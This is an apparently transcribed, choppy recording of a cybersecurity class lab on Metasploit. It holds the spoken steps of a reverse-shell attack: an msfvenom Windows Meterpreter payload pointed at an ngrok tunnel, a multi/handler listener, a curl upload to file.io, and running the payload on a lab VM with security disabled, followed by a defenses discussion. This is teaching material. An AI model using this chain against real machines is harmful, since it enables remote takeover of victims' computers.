Mm-hmm.
Am I supposed
So you're just gonna want to go to your email that you signed up with.
okay.
Skip. Got it.
Let me
So,
click on
and
it.
then I'll bring up the steps again just so you guys can see. So I already confirmed my account, right? I already did all that. I skipped the MFA. Bring up
Uh,
chat. I skipped the MFA,
I got
right?
nothing in my email though, but I
Uh,
did skip that too.
you might want to check your junk too, just in case.
I ain't going in junk. That's I'm gonna search it.
Mm-hmm.
My Gmail.
Here we go.
It hasn't sent anything just yet.
Yep. So scroll down here. We could just I just put IT professional. Connecting to devices.
But we are
Okay.
installing that on our actual computer, right?
Well, the funny thing is, it's not an installation. It's just setting up an account, and then it should give you an authentication token.
Mm. Yeah. Okay, so when I tried to say connect, establish, ingress for your application Windows,
Sure, no worries.
even it's
Shernet,
it's
don't
already
worry about it. The recording is going to be available later on. You'll be able to see it. And again, this is going to be a very heavy lab, I will say. So just review the lab video as best as you can. And if you have any
oh,
questions, feel free to reach out to
my
me
token.
or your TA from your group. Okay?
I got
Be
my
safe.
token.
All right, you got your token?
Got my token.
Ooh, chat. There we go. All right, so let's see. Where
Here,
your auth token? There we go. Ooh, there is our auth token. Boop boop boop. Look at that. You can even use it here too. Copy. Look at that. All right. So
so we want to put in our terminal. We want to add the add.
yeah, so what we're gonna want to do is, as it says right here, the instructions for ngrok. We're gonna go ahead and hit exit here in our terminal. Right. We're gonna change directories to the temp folder. We're gonna type in the following command that it says there. So you can type in wget https://bin dot equinox. I mean, you kind of see it here, but I'm gonna go ahead and just copy and paste it because, you know, sake of time and also explanation. Boop. We're gonna go ahead and hit enter and OK. And boom. We should get something. We should get something like this where it says that it's installed, or at least it's downloaded and saved. We're gonna go ahead and following command for this one here, which is basically, from what it looks like, adding the authentication token. Now, the token itself is going to be different. So this is the token here that's already given. This is what was mentioned before for previous instructions. So this is where you put your authentication token if you already have it, okay? So for me, here's my authentication token. Going back to Codio, pasting it. Ta-da. And then we hit enter. Ooh, ngrok. Okay. That's where I missed it. That's the command I missed. See, look at that. So it happens when you don't pay attention, right? Paste. So we're going to go ahead and copy that one. tar hyphen xvf ngrok v3 stable, right? So I'm going to go ahead and hit up on my keyboard. Still has my authentication token and the previous command that I ran. Hit enter. And as you see right there, it says authentication token, auth token saved to configuration file. So Xavier, are you on the ngrok page where it says like getting started and such after you've already signed up? Okay. So if you're already there, you're going to want to click on setup installation, your auth token right here, left-hand side. Your auth token is going to be literally at the very top. Oop, close out of there. You see that right there? This is your auth token right here. Sweet. Awesome. Anybody else lost on their auth token? Everybody good?
I got
Yeah,
to the part where it says I did instructions for ngrok. I got to 6. I typed that in.
Ah, so you're right here, ngrok TCP 8001.
Oh yeah, I accidentally didn't include the 1, so let me do that now.
Mhm.
Okay, and then at this point, it said it should be installed, right?
Yep.
And then the screenshot above, blah blah blah, and then now I need to open up another terminal.
So right now at this point, ngrok is installed. So I'm running it. Boop, look at that, installed. All right, so you use 2 ports that create the.
I got authentication failed. The account test API has been suspended.
Hmm.
This is usually the result of violating the ngrok terms of service.
Ooh. You did a bad thing. I'm just kidding. So
Today ain't my day.
it's okay. Not everybody's having a good day with
It's
Codio or
not okay right now.
it's okay. So you did the ngrok TCP 8001, right? And then that's what it gives you that error.
Uh, yeah, it's
Uh Filippo, did you exit MSF console and then do this separately?
let me double check. Yeah, I did the exit, did all that. I did the tar.
Mm-hmm. So
And,
tar, you,
and then
you copy pasted this, and then in this one right here, you replace this token with your own, right?
yeah, I used my own token, and that's when it said unknown command.
oh, I didn't use my own token though.
Yeah, I got the unknown command too with my token.
Ooh. Okay, so far that's 3.
But
Okay,
3,
before
4,
before
5.
that, yeah, I had got her message
Mm,
about the file, and then
mhm.
I kept trying it again and again because I really wanted to be ahead of it today.
Gotcha. No worries. No, no,
yeah,
I
I'm
understand.
gonna try it over.
Yeah. Katie, when you're choosing
Exit
it, and
us.
are you saying in signing up for ngrok, just choose any option. It doesn't have to say anything. I put I'm an IT professional, and then I just put production. You could do development if you want to. I think it should still give you the same thing. Otherwise,
Oh,
it could be
man.
that.
Okay,
Maybe it could be that that's what's causing the
exit.
error, that we select developer instead of production, I believe.
Okay.
But
Exit, navigate, CD.
let's see how many pages we got. All right, cool. We still have some time to go. Exactly, right? All good questions. All right. Here's what I'm gonna do, guys. To kind of give you guys a chance. Did they use the period forward slash? Possibly they might have. I mean, like I said, I recommend copying and pasting it if it makes it easier. Others just type it. I just for me it's a little bit more cumbersome to type it because it's a lot.
Not
Sometimes I
typing
fat
it.
finger the wrong thing. Yeah, but
Okay, so now I'm at 5, and I put that little token, but I put my own token after that, right? Instead of the one
no,
I
no,
have.
no. You're gonna want to erase that one. The one that has starting with 2x, ending with KBX. You're gonna want to erase that.
Right.
Erase
That's what I did
that
the first
token
time.
and
I
then
didn't
put
erase it. So now I need to put my own token, right?
yes. So you put your own authentication token there. So make sure
All
there's
right,
a
so
space
copy
after the
that.
N and then your token.
Okay,
And
so
then once you do
space.
that, then that's gonna say, um, it's gonna have your token saved, right?
Space after the N. Go back, go back, go back.
Real-time threat indicator. Alan, if you don't mind coming off of mute, is this under the virtual machine itself? Because that's where
Okay.
you're supposed to be doing this on your virtual machine, not
I
on
think
your
I got
your
it.
real
It
machine or your
said
local.
the token was saved to configuration file. Now I put in the 801, right?
Yeah, so dot slash ngrok space TCP space
All right,
8001.
fingers crossed.
Yep.
I got it. All right, cool.
Woo! There we go, Nito. There we go. There we go.
Nito
Awesome.
Guru, let's go.
Pull request caption on your browser. Nice. Look at that. You're an AI wizard, Benny. It
Oh, what did you guys? What's the latency supposed to be at?
really doesn't matter.
Okay.
Yeah. Latency is gonna change from like 9 seconds to like 10 seconds. It did that for me earlier. So
Okay. All right.
sweet. Good job, Katie. All right. I'm gonna give you guys a chance to kind of like catch up with this page here. We're gonna stop where it says generating your payload in a new terminal. I'm gonna give you guys about you guys want like 15 minutes, 10 minutes for a break, kind of get up, stretch, maybe even just like go back 15. All right, so it is, let's just say it's 4:53, 5:08. 5:08 sound
Okay.
good? Or you
All right.
guys are, how about this? I'll give you guys till 5:10, a little bit extra time just in case. So that way you
Okay.
guys can catch up too, just in case.
And when we come back, we're gonna do number 7 together, right? Generate your payload in a new terminal.
Yes, we're at 7 right now, generating the payload, which is, the next stop.
Okay, so don't do that one yet. We'll do that when we
No,
come back.
no. All right, I'm gonna go ahead and pause recording so that way it makes it easier for us. All right, you guys enjoy your break, stretch, get some water, stretch, touch grass, whichever is easiest. All right,
Okay, cool.
cool. Let me know, guys. Let me know if you guys hear the music. Can you guys hear the
No
music or no?
question.
Yeah.
Were we supposed to? Okay, so when I signed up for the whatever the NGR, okay,
And Grok, yeah.
yeah, and Grok, I did it on my computer. I didn't do it through Codio. Should I have done it through Codio?
No,
Is that
I
what you
mean
were
I'm doing
saying?
I'm
No,
no, no,
no,
you
it's
don't have
fine.
to. I'm
Okay.
doing it. I'm doing it through my local machine either way. So you should still be able to get the same authentication code. That's all it is.
I mean, I got the code, but the code's just not working.
Okay. Do you got
It
like
just
a?
says
Can you send me a
unknown
screen?
command. It says,
Unknown command. Can you
yeah,
send
it
me a
says run
screenshot?
the help command. Yeah, let's see.
Yeah, go ahead and
Um,
run it.
let's see. God, I have to change my settings. Let's see. Hmm. I don't know. My camera's on, so I don't know why it's saying give Zoom access for my controls. That's weird.
No worries. If anything, just quick snapshot, paste it into the Zoom chat that we have right here for the breakout room. I should be able to see what you're seeing.
Okay, when you paste it, because I'm using 2 different computers, so
Ah, that's probably why.
so yeah, so so if I take it with my, that's why I was trying to take it with my iPad, but it says change settings. It says allow Zoom Workplace to access your photos from settings. Oh, Zoom Workplace photos. Okay.
So
Settings.
that's probably what it is. It's just asking you to allow Zoom to paste whatever you're trying to paste into the chat. Usually Apple products are very finicky when it
Clicked
comes to
on it,
that.
but it's not settings. Okay, let me go back and see what it tells me. It says change set. Okay, so I got to go to settings, Zoom Workplace and photos. Okay, let me go to settings.
Huh?
I don't see Zoom Workplace. Would that be under general? Let's see me go down. That's so weird.
Usually you can see it as like just Zoom in general.
Okay. All the way down, Zoom. Okay, Zoom. And then photos. Okay.
Oh yeah,
Somebody's got some successful moment now.
yeah. It was a dumb moment. I I'm so used to doing the command prompts on my computer,
Uh-huh.
and I didn't think to look at the screen like the mirror image, almost a mirror image of my command prompt, but it's like in the actual Codio.
Oh.
So I'm used to doing it on my computer, like where I pull up the configuration and everything else.
Oh yeah. No, I understand.
So yeah, so all right, let's get in there.
There you go. There you go. Now we're cooking with oil.
Oh, let's have fun.
Mm-hmm. And Chanela, I'm glad that you're able to restart yours and get yours working again. That's awesome. Filippo, how's it going for you? Were you able to get your new token? If you're not in, it's okay.
I'm
Probably.
still getting my new token at the moment.
All right. Cool. If there's anything that you need from me, feel free to either share, screenshot, send me a Slack, or just throw it in chat. I'm here to help.
Hey, so I got my token.
Mhm.
So for step number 5,
Yeah.
how do I put it in there?
So on step 5, you have the ngrok with the auth token stuff, and then it has that token already there, right?
Right, it has that.
It has that 2x, and then it has the KBX that it ends with. You're gonna want to erase that token and put yours in there in place.
Oh, okay.
Yeah. That token's the one that's gonna be constantly used. So if it's consistently used by multiple people, it causes an issue to where it won't run or use ngrok. That's why
Okay.
that's why the recommendation of creating your own auth token
Mhm.
allows the system to run separately.
Okay, I got it.
Mm-hmm. Now, bear with me too, because I'm also trying to catch up with my normal work hour stuff that I have. And it's like clock out time already, but it's like it's not something I can get access to. I don't have anything else. So we'll go down here. Oh, session expired. Huh, that was weird. Somebody had messaged me and then erased their message. Cool. Somebody might figure it out. Have a great weekend, everyone. Be safe. Log in to submit my hours. So one of the plus and minuses of working from home, you can multitask and do stuff, but there's also a caveat to it when you have kids that either go to school or you again, you have two jobs in a sense. All right, time
Hey, so
partner.
question.
Yeah.
I use a different email, so
Mm.
go back into the Nugrock. It's
Yeah,
asking
and
me
Grok,
these
yeah.
questions like, IT
Yeah,
professional.
so go ahead and just select IT professional, right? Just to kind of BS it. What are you going to use it for? It doesn't matter. Just pick whatever. And
Oh,
it doesn't really matter. What we're trying to get to is getting your auth code, auth token, sorry. And then you're going to want to select. I selected production instead of developer. So I don't know if maybe the reason why your auth code didn't work, auth token didn't work for you was you selected developer. So try production instead.
okay.
Yep. Ooh, boy. All right. I'll be right back. I'm going to use the restroom and grab some water. But feel free to post any questions and stuff in the chat, and I'll be answering them as soon as I get back. All right.
Cool.
We got 8 minutes. All right, all right, all right. We are at the hour. We should be back now. Switching audio. Nice, nice. Uh, Douglas, did you remove the previous authentication of the auth token that was on step 5? Because that's probably what it was. Okay, you did, and it's still not accepting it? Hmm.
I signed up, got an account, went on my account, and then got the token from there.
Got it. So it took the
It-
it didn't take the authentication code. You ran I mean, you followed obviously all the steps on steps 1 through, 5,
yeah,
whatever.
I'm on. Got and Grok got unpacked, and I'm on the next command. Configure, add authentication token, and I erased that one. Well, I backspaced through it
Yeah,
and pasted my token in there that I got from Ngrok on the website.
gotcha.
on my account.
Okay. Okay.
Now, there's two different tokens. There's one on my Google account in ngrok, and then there's another one, your authentication token, which is on the under your authentication token. And I tried both,
So you tried both and still no dice.
no dice. And that's the only two tokens I see. One is for it's the tunnel for your Google account, which is what I signed up with, my Google account.
Mhm.
And the other one is your authentication token, which is on getting started, setup installation. And neither one of them work. That's right. Well, it's just rejection. Reject. It says unknown command, so I'm not sure if that's the token or if I'm typing the command in wrong. I'm copying and pasting the command. Do I
Got
need
it.
sudo here or what?
No. So
Did you put a space after the N? Because that'll do it too. Before
After
you
the
put your
what?
token. Yeah, before you put your token in, you gotta put a space.
Yes, there's a
Okay,
space.
cool.
yeah. What about the
I didn't run it
dot
together.
forward
In
slash?
fact, I tried just running ngrok configure add authentication token, hit enter, and then hit it. That didn't work either. I thought they might be two separate lines, but they're not. They're the same line.
Yeah. So you did.
And I also tried it with and without the op at the end, and neither of
Okay.
those work.
Gotcha.
So I'm not sure.
The other option is you could do a quick refresh of the browser. Try running the commands again, and then see if the authentication token is taken.
Okay. Well, I'll give it a try.
Yeah, give it
I'll
a
just
try. If you could too, like screenshot, send it to me. And that way too, I can kind of ask the TAs as well to make sure that, if there's any errors or issues like this that we experience, we can kind of address them at the same time. Okay. All right. So due to the fact that Alan, yes. So sorry. So due to the fact that being idle on Codio, it tends to kick me out. And I don't know if it does it for you guys or not, but it did it for me. So let's see if I can still run ngrok. Hey, look at that. Runs it and it doesn't show any latency. So very nice. All right. So let's see here. Who else is still struggling with the authentication code other than Douglas and
Alan.
Alan? Yeah. So Alan, where did we stop with you? Like, how far did you make it?
I'm right here where they said Metasploit commands, and I put in grip Metapreter search TCP.
Ah, yes. So you typed in that. It gives you like a long list of all TCP protocols and exploits that you can run, right?
Yes.
Awesome, awesome. Yep.
Uh,
So you're probably going over to step number 4, where it says type in info space windows slash meterpreter slash reverse underscore HTTP. Then you're gonna hit enter. It should give you information based off of what that is, what that exploit has, and so forth.
okay.
All right. And Carrie, thank you for that, for the assist right there. Appreciate that. All right. So we are, oh, no, right here. We're creating the payload. Come on. We already did that. Nope. We're at ngrok. There we go. Beautiful. All right. So we're going to go ahead and open up another terminal. So we're going to go ahead and go to tools, terminal. Oop, there we go. Now you can have them separated. You can have the virtual machine in between. Just depends on how you like to have it. I like having it side by side. All right. So we're going to go back over to our temp folder. So cd/temp. Oh boy. Interesting. Oh, that's why. CD TMP. There we go. I put temp instead of TMP. All right, so now we're going to generate the following payload. Now make sure you guys read the instructions below where it says to type out the command into your terminal with the correct domain and port, right? So make sure you replace the ngrok domain with the domain that ngrok provides for you. So over here, the domain is going to be this one right here from what it looks like. Domain and ngrok port is the port that ngrok provides you, which is the 4040, I want to say. Let's see here. Well, let's give it a try.
You need to follow read the instructions below and type the command in your terminal.
Domain is after. Oh, thank you for that. Let's try to remember how I did it last time. So TCP, so this is the domain right here.
And the local port.
Mm-hmm.
Okay, so I want to put this in here. I want to copy this on a notepad.
Yep. You can copy into your notepad. So you're going to want to copy this part right here where it says 4.tcp.ngrok.io colon and then the numbers. All right, so then ngrok domain.
So then we'll web. Okay. Oh wait, where's the port? Oh, there it goes. Okay, so so the address we need, the domain we need to put in there ends in 4040, right? Oh no.
So the domain itself is going to be right here where it says forwarding. So it's going to be after your TCP. And Scott, thank you for that as well. It's where you get it from. So after the :// this information right here that you can hopefully see highlighted in very light blue is what you're going to want to copy and paste.
I got that copied. I'm asking where does the domain end? Oh, localhost is, so the host is 8001, right?
So where it says right here to replace ngrok_domain, that's where you're gonna put that domain itself.
I'm just asking. Okay, I get that part. I just don't know. Is there two sets of lines? So the web interface is the domain, and then the port starts with TCP, right?
So if you look at it right here, let me see if I can maximize. Can you see that a little bit better?
Let me maximize you.
So lhost, the ngrok part, you're gonna just put this. This is what Scott's mentioning. So the domain's gonna be after TCP://. So the one that I have or it gave me is 4.tcp.ngrok.io. And then the port that you're using is the one after that colon that you get. So on mine, it's 4.tcp.ngrok.io. That's the domain. And then this is the port number that it's giving me. 18682 for me.
Thank you.
You're welcome.
Okay.
Actually, I would say more thanks Scott. Scott's helping out here.
Oh,
18682, I believe that's what mine said. 18682, 18682. There we go. Or control 0. Okay, cool. All right. So your payload should look something like this. And here's it even gives it to you here. So that's kind of the example. There's your domain, there's your port. And here's a bit of a breakdown too, so you can kind of understand what we're doing with this. So there's MSF Venom, which is a command used for generating payloads to be employed in various contexts and offer a variety of output options. The Nov_16 meta is the name that you're giving to the payload. So that's the payload's name itself. -F exe is the executable output. So that's where you want to focus your interest. And then the -O stands for the output. right? So in this one, you're going to be outputting the executable file as hope.exe into your root machine's desktop folder, right? All right, so we're going to go ahead and hit enter on that. Let's see, did it do on mine or is it still taking its time? There you go. It tells you right there. So Windows from the payload, NARC, it's okay. There's the size and there's the file. So I didn't give mine a name. You can give yours a name. So you could do, NOV_16 meta. You can give it however you want the name for the executable itself. So pick a name, stick to it. Doesn't matter. But as long as you remember that name, the exploit name, the rest is going to be a lot more easier. If you don't remember it, it's going to complicate things.
Oh, actually. Okay, let me fucking go back. That's not it.
All right. How we doing so far? We doing no good?
Nope, but I'll be all right.
Okay. I got stuck on the info command. When I typed the info command, it provided me the details. When I view the full module info with info dash D
Mm-hmm.
command, and I did that. And I put that in, and it gave me the MSF6 greater than less than info dash D usage info modular name mod 2 mod 3
Yeah, so it gives
options.
so it gives you like a breakdown of what the exploit is that you selected.
All right. So when
Mm.
I went down to try to type in set, it gave me global no entries in data store.
Don't worry about it. So it just
Don't worry
basically
about it.
means that there's no global database set for it, but it's still there. So you've already set it.
Oh, okay.
Yeah, so you should be good. You're good to proceed.
And just exit.
Yeah, just exit.
Oh,
All right.
6.
So
Okay.
in the sense of time and effort here, I'm gonna go ahead and move forward from here. You guys can read this at your own leisure. All right, so now we're gonna go ahead and deploy our payload. All right. So in our separate, terminal where you want to keep this ngrok command or ngrok instance running, and we're going to go to terminal. We're going to go ahead and type in sudo msf console. We're going to go ahead and get that started.
Jesus.
All right, we're at 524 right now. How's everybody feeling so far?
I finally just got the
Nice, nice, nice.
I just put the I'm hoping I'm waiting for it to say it says no platform was selected, choosing module from the payload, no arch selected, selecting arch A6 from the payload,
Yeah.
error. One or more failed to validate L host.
Okay. So for your L host, make sure that you're using this one right here. So you put this right here, that's your domain, right? You leave out the colon, and then your port is this one right here.
Okay, so I need to leave out the colon and then so just leave a space there and then I
Yeah.
can go there.
Yeah. So see how mine right here, I put that 4.tcp and then ending in IO. That's your domain. So that's what you're going to want to put. For your L port is going to be that number that you see at the end without the colon.
Oh, so you put it's a uh okay, so after IO, then you put L, you typed L port, right?
Yeah.
L port.
Equals, and then that port number that you see from ngrok, which is this right here.
Okay, and then equal.
Yeah.
Okay, so let me type that in, put that
Yep.
in there.
So hopefully that helps. All right. So now that we have it set up, we're going to go ahead and type in use exploit / multi / handler. Oops, / handler. Hit enter. So now we're using the multi handler exploit. So now we're going to do set payload windows.
I went to the next page and then everything like it disappeared. Is that supposed to be?
Like you don't see your terminal, your virtual machine, anything like that?
I just went to the next page where it says deploying the payload
Yeah.
and my terminal. Oh no, it just popped up another terminal. Never mind.
Yeah. All good.
I was able to go back to mine.
Nice. All right, cool.
Okay. I'm like, wait, what?
So we're gonna
Okay.
go ahead and type in your set payload windows / interpreter / reverse. So it doesn't let me finish auto finish. So reverse hyphen. Uh-oh. Come on.
So I don't put that in the new terminal that popped up. I put it in the one I already had, right? With the payload.
Yes. So if you already have the payload that you developed and everything, you're gonna want to go ahead and just type in sudo msf console.
All right.
Yep. Reverse HTTPS. Enter. Set lhost 0.0.0.0. Enter. Set lport 8001. And then you're gonna type in show options.
Oh, I got a ninja.
All right.
Uh,
How we doing so far? You guys are saying the same stuff. Nito, you're almost there.
Yeah, I'm putting in 3 right now.
Awesome, awesome.
Multi-handlers, right? Enter, okay.
Yeah. So use exploit / multi / handler. Okay.
All right, we're supposed to be on what number?
So if you already launched multi-handler, you're going to be on 3 now. It says set payload windows / interpreter / reverse _ HTTPS.
Oh, okay.
Yeah.
I went to 4.
Oh.
I thought I was supposed to be catching up with you guys. I thought
It's
y'all
okay.
right. Okay, sorry.
It's okay. No, you're good. You're good. Like I said, we'll be able to go back with this video and kind of go over it just in case.
All right.
All right. So now that we've done that, we see the options. We have everything set up. Now we're going to go ahead and run our exploit. You type in run and hit enter.
So since I went to 4,
Mm-hmm.
should I just press the up arrow so I can get back to 3 and then do run?
Yeah. I mean, you could just type in 3s right away and then move on to 4 and everything.
Okay, so I did. I'll just go back to 3 and then click run after that.
So you already set up 4, 5, right? And
So I do got to go to 5.
yeah, you still got
I did 4.
So you
I
only
thought you
did
guys
4, but you didn't do 5. Yeah, no, that's fine. So if anything, just do 3, set the payload first, and then just type it in again for number 4 and 5, and see if it does anything or changes anything. All right. So right now you see right here the reverse handler is running in the background. We're gonna want to run another terminal window. I'm gonna go ahead and open up another one. So now we have to upload that payload to file.io for a download. So again, in this terminal window, we're going to type in cd/tmp for temp. And then here, we're going to want to go ahead and type in our base directory. Or we're going to be in our base directory, and we're going to type in this command. So the command would be curl -F space file equals the @payload name. So mine I didn't change it. I just left it at payload name, so for the sake of time and argument. And then you put in that website, https://file.io. And as it says right here, after you replace your payload name. So make sure that if you have a specific payload name that you created, make sure you use that same name. This is what I was saying earlier. And then afterwards, just change it here. And once you're done and ready, you're going to want to go ahead and hit enter. So curl, failed to open, read local data from file application. Oh, well, what's here? Interesting. What have we got? Yeah, it looks like it failed to load for me too, Michael. Scott, what about you? Did it fail for you as well? Or did it load? Are you good? All right. See these?
Okay, so after I did, I got past where it came to started, the reverse handler on 00 blah blah blah.
Mm-hmm.
Now I need to do go to the virtual machine, right? And then put in.
No, so you would go into another terminal window. So you have to keep those two terminal windows open. So your
Okay,
ngrok
I'm in
and the one
other
that's
terminal
running.
window.
Yeah, so you're
And
gonna want to
put
open up the third
CD
one.
temp. Right. Okay, so I got CD temp in the new one. Once you're in your base directory type, we'll put that in there.
All right, I'm gonna try it your way, Scott. See if it works for me. Just without the quotation marks, I'm assuming, right? Or leave it. Okay.
12, 5, 16.
Nope.
Oh, I got failed to open read local data from file application.
You didn't like mine.
That's what you got too?
Yeah.
After you place program.
So since mine, I didn't change the name, I had to put it back to the way it was. So
Okay, so I didn't change the name on mine. I didn't make a name for it. So would it just be?
there we go. So if you didn't do a name for yours, you just have to type in .exe after the name portion, and then just hit enter once you put the rest of it.
Yeah, I got it.
Awesome, awesome.
All right.
Okay,
Anybody?
so for curl, you said put. That's
Yeah.
what.
So it says right here, curl-f file equals @payload name, payload_name. You're gonna want to type in .exe after that, and then the https://
So okay, so do name, and then you said .exe. Exe.
Yeah, .exe, which is the executable. And
Right.
then once you hit upload, you should get a link that says https:// file.io, and then the name of the file. Oh,
This should be fine.
close that out quick.
I'm gonna give it the URL.
You might want to just be
Okay,
careful when clicking it, though.
1, 2, 3. Wow. Okay. So private.
Oh, we gotta turn off this and
Okay, so
turn
take
this.
that URL, right? Then
Yep.
we got.
And you're gonna want to paste it into your virtual machine's Google Chrome browser.
Okay, so my virtual machine, Google Chrome.
Yep.
Browser. Okay.
So as soon as you do, make sure you go down a little bit and you see download file. Go ahead and hit download.
Scroll down until you see download file.
So like for me right now, it is still loading. It's still trying to download it.
Okay, it doesn't like my address. It looks like it got file. It said missing and then show results. It's like,
So did you copy and paste it up top at the web address bar?
yeah, so I did the one that popped up in the link in my terminal.
Okay.
So I put the one that's on 3 instead.
So See how it's right here where it says payload name.exe title null. So there's one that says link. So you're gonna want to copy the one that if you hover over it, that's the link that you're gonna want to copy.
Right. It looks a little. I mean, the address is obviously different, but that's the
Yeah.
one that I put in there.
Yeah. So if anything, what I could recommend doing is just copy everything from the quotations from one to the other, and then paste that within your virtual machines, tab here. So like for me, I downloaded it. It worked. So now it's sitting in my downloads folder. And there it is right there.
Virtual machine.
So we want to go ahead and run it. We want to hit more info, run anyway. And now it's running in the background. So now we're gonna.
Now I see it. All right, download file.
Yep.
I accidentally added the first quote.
And there you go. See right here how it has information. Now we got info. It says that it was running and opened and everything. So yours said failed to open, Larry. So when you double clicked it, did it give you a blue window, giving you either more info or what was the other one? I can't remember, but does it give you those two options?
I got the transfer you requested has been deleted.
When you downloaded it or when you uploaded the file?
When I click download file.
Okay, here, let me go back real quick. So it gave you.
I see payload name, and then it says file will be deleted after download expires.
Oh, that's just probably a normal setting. So you're gonna want to go ahead and just.
Already?
So you would want to make sure that you still download it. So it should give you the option. Oh, Larry, for yours, make sure you're adding .exe after name. So yours would have to look like that.
I got
The only
it. Okay.
difference is yours would have to have this at the end. So here's the new code or the new line that you want to type out or post into your terminal. So try that next instead and see if that works for you. All right, we are at 5:39, so we're getting close. We're almost there. So Xavier, you probably didn't disable your Microsoft Defender stuff from, I want to say, security protections under the very first one for Metasploit Lab. So you might want to go back and disable them first, as well as the one for Google Security. And then once you do, then you should be able to do the download again. Give that a try, okay? All right. So now that we already downloaded the file, we have it running. As you can see right here, it's running.
It says click on the arrow icon next to the keep button. Where are they getting this keep button at? All I see is I have in recent downloads is there.
So if you click, there we go. So it would have given you like a little arrow next to it. If you click on it, it says download anyway because it's trying to block stuff.
Yeah, mine look like yours right now that you're looking at. I don't see like a little arrow or anything.
Copy and paste the link again and do it. Okay, so you're getting that issue. What about for Google Security? Did you disable that as well? And the firewall one too?
I did all of mine.
Oh, sorry, Xavier. I was asking Xavier. My bad. So Xavier, you did that one as well as the. What about the antivirus one? Did you disable that one too? Yeah, Manny, more RAM. Make sure that it's RGB RAM too.
Yeah, I don't get keep. I get open it up in a new one, open, and I can go to the folder that it's at, showing folder.
Oh, but is it in there? Is it showing where it's at?
Yes.
Okay, so if the payload name is there and it shows as application and it kind of gives you the option to kind of double click and launch it, then you've downloaded it. Xavier, check your antivirus one. Go to Windows Security. It's gonna open up this window. you're gonna see this one right here. You can click on it on the left-hand side, and you're gonna wanna click on turn off for virus and threat protection settings. I think that's what's causing that problem. Try that. If it is disabled, it might be something else. It is. It is disabled? Okay. Um hmm, that is odd. The only other thing I can think of is maybe restarting the virtual machine and trying again, or even just resetting it and just disabling those 3 security protocols, and then try downloading the file one more time. Give that a try. Um, Obviously at a later time if you want to just hang out and just see what's next. So, cool. So since we already ran it, everything's working from here. We're gonna type in sysinfo. Some interpreter should pull up the information for the virtual machine or the machine that we have access to. And you should see that it says it's a Windows Server. I mean, technically it would have been like a Windows 10, but this is giving us Windows Server 2019. The architecture, so it's a 64 processor type, and what language it's in, the domain, how many users are logged in, and what type of program is running in the background, which is the 64 or the 32-bit version of Interpreter, right? So you could always type in help to, and it gives you like information based off of okay, so look, it's probably the same thing. So same stuff for no. Can I do CLS? Nope. Okay, cool. So I can't do anything like that. So right now, I was trying to clear the screen, so ignore that command. So right now we're gonna make a directory with the specific name. So let's go ahead and do MK for make directory or dir and a folder name. Let's say you are hacked. You know, you are hacked with a 3, and we'll hit enter. So now it looks like it's making the directory. All right, looks like it did. And let's see here. Where is that directory? Oh, it made that folder. Look at that. We are hacked. Another thing too you could do is you can reboot the system since you have root access. So you can type in reboot, enter, and it's gonna reboot. Go back to your virtual machine. Oh wait, what happened? There it is. It's rebooting. So all that finagling, all that difficulty with the authentication token, the getting interpreter set up, and getting our proper domains and ports. This is basically what leads up to it. This is how hackers can gain access and entry to specific machines based off of, hey, download this file that you require, or hey, this is the document that you were looking for, follow this link. And usually with Windows, it auto downloads it if it's configured that way, or with Mac or even Windows too, depending on your antivirus and security protocols, it'll either tell you that it's blocking it or stopping it from downloading itself. So now we know that this is what we kind of have to keep an eye out when, dealing with malicious code, malicious software, and etc. Do you guys have any questions, any concerns, anywhere that you might have been stuck with? Maybe Manny can help you out with giving you more RAM.
When I put sys info,
Yeah.
and I'm doing it again now. When I did it the first time, it said, let me go back up. Unknown command, sysinfo run the help command for more details.
Are you running this on the one that has the MSF console with the interpreter running?
I am. Like I said, I ran it again, and while I was talking, it waited and it put it up.
I'm telling you, Codio.
Okay.
It's Codio. It's terminal
The
Codio
same thing
virtual
again,
machine.
and it just now
Yep.
it works. Okay, so Windows Server 20.
You're a RAM wizard, Manny. Anybody else? Any other questions, concerns? Maybe like
Now we need to
other.
take a screenshot of this. Type screenshot.
Yeah,
No.
you can if you want to. I mean, the only question that really was part of the lab was the one regarding the grep command that you ran.
Oh, it saved the screenshot. Okay, got it. Okay, so type ones. Oh, no, it's the LS. And this
Nice,
command
nice.
is
Cool,
to
cool,
list
cool.
all files in the current folder.
All right. So I'll just
Oh,
All right, so I'm gonna go over the conclusion. So obviously, you made it to the end of the lab. The attack was successful. Unless the user downloads and executes the executable at their endpoint and the Windows host defenses are turned off, then obviously the command will never work or the exploit will never run.
oh shit, shoot.
So obviously, for its attack to succeed, you need two real-world vulnerabilities, which have to be exploited, right? The computer user who downloads and runs the unknown executable file, and a device that does not have any security whatsoever, regardless if it's basic or advanced, right? So by understanding how these vulnerabilities work and how they function, we can create specific defensive measures and prevent this type of attack, right? So here's,
Oh,
uh-oh, that didn't sound good. What was that?
uh, premature. I was putting the code,
Yeah,
and I guess it went to print PG key and it began a PGP public key block, and I got all the stuff.
So you got a bunch of hullabaloo mumbo jumbo. If you want to take a screenshot, share with the rest of us so we can kind of see what happened.
Yeah, I showed you.
Yeah, for sure.
I won't be able to take a screenshot, but see if I can take a picture right quick.
Yeah,
Uh,
whatever's easiest for you in order to kind of like share.
most important thing.
All
Actually, I
right.
might be able to take a screenshot. Oh man.
Windows would be just print screen. Mac, I think it's Alt or Command print screen. I don't remember exactly. I haven't used Mac in 16 years since my graphic design days. But here's a question for you guys. So, what type of defensive measures can a security professional enact to prevent this type of attack from succeeding pretty
Your
much at,
firewall.
a corporation like Amazon? What do you guys think? What would be a way to create those defensive measures?
You gotta keep your firewall up, right?
One more time?
Your firewall, keep your firewall up,
Yep, firewall is definitely one of them.
and don't download stuff that you don't know what it is.
Exactly. Don't click on suspicious links, download stuff that ain't right. Encryption would be good too. Manny's got it too. Ensure basic security controls are enabled. Yes, definitely security updates is another one too. You want to make sure that everything's up to date. You have the latest security measures. It's protecting your system. Viruses and malware, no difference between update and non-updates. They still try. Yeah, Chanel, don't play around in terminal when you don't know what you're doing. And yeah, security awareness trainings, IDS and IPSs, and it seems definitely too is another good one too. I don't know. I'm gonna have to roll for initiative there. Hold on. Gotta roll my D20 dice. Hold on. Ooh, we got an
D20.
8. Sorry, Manny.
You're not D&D.
Oh wow. Let's see here. Okay, so Alan, on yours, did you for this authentication auth code or auth token, sorry, did you put that with the command itself?
uh, when I was putting it in, I was putting it in with the command. What's this thing called? Uh, Miss Miss Finstall. I was putting it in with that right there, and I didn't type all the way out. I got
Gotcha.
halfway through, and it accidentally when I stopped at wrappers, and I accidentally hit enter by accident, and it just did all that.
Gotcha. So,
So I got to type it all the way through again.
okay, so just to make sure, were you saying this from page 6 or page 7?
Page 6.
